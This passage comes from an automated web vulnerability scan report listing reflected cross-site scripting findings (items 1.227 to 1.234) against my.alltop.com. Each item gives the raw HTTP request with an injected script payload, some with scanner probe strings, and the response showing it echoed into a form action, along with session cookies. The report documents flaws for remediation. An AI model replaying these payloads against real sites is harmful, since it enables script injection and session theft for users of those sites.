Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>36733<script>alert(1)</script>b1dcf723d06" method="post" accept-charset="utf-8">
...[SNIP]...

1.227. http://my.alltop.com/alpha/w [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c38b0"><script>alert(1)</script>909e3c865c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/wc38b0"><script>alert(1)</script>909e3c865c2 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:04 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:04 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/wc38b0"><script>alert(1)</script>909e3c865c2" method="post" accept-charset="utf-8">
...[SNIP]...

1.228. http://my.alltop.com/alpha/w [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78ce8"><script>alert(1)</script>82cd37b2ea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w?78ce8"><script>alert(1)</script>82cd37b2ea0=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w?78ce8"><script>alert(1)</script>82cd37b2ea0=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.229. http://my.alltop.com/alpha/w [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e86a"><script>alert(1)</script>4c575002120 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E5e86a"><script>alert(1)</script>4c575002120 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:31 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:31 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E5e86a"><script>alert(1)</script>4c575002120" method="post" accept-charset="utf-8">
...[SNIP]...

1.230. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d82"><script>alert(1)</script>5b19d9a730b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C20d82"><script>alert(1)</script>5b19d9a730b/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C20d82"><script>alert(1)</script>5b19d9a730b/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.231. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c59db"><script>alert(1)</script>f6b5442e0d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3Cc59db"><script>alert(1)</script>f6b5442e0d9/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3Cc59db"><script>alert(1)</script>f6b5442e0d9/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.232. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d27e8"><script>alert(1)</script>e7d36a383a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3Cd27e8"><script>alert(1)</script>e7d36a383a3/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:21 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:21 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3Cd27e8"><script>alert(1)</script>e7d36a383a3/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.233. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ffe"><script>alert(1)</script>729d89e3258 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3Ed3ffe"><script>alert(1)</script>729d89e3258 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3Ed3ffe"><script>alert(1)</script>729d89e3258" method="post" accept-charset="utf-8">
...[SNIP]...

1.234. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46d5b"><script>alert(1)</script>ad51198bb33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E?46d5b"><script>alert(1)</script>ad51198bb33=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
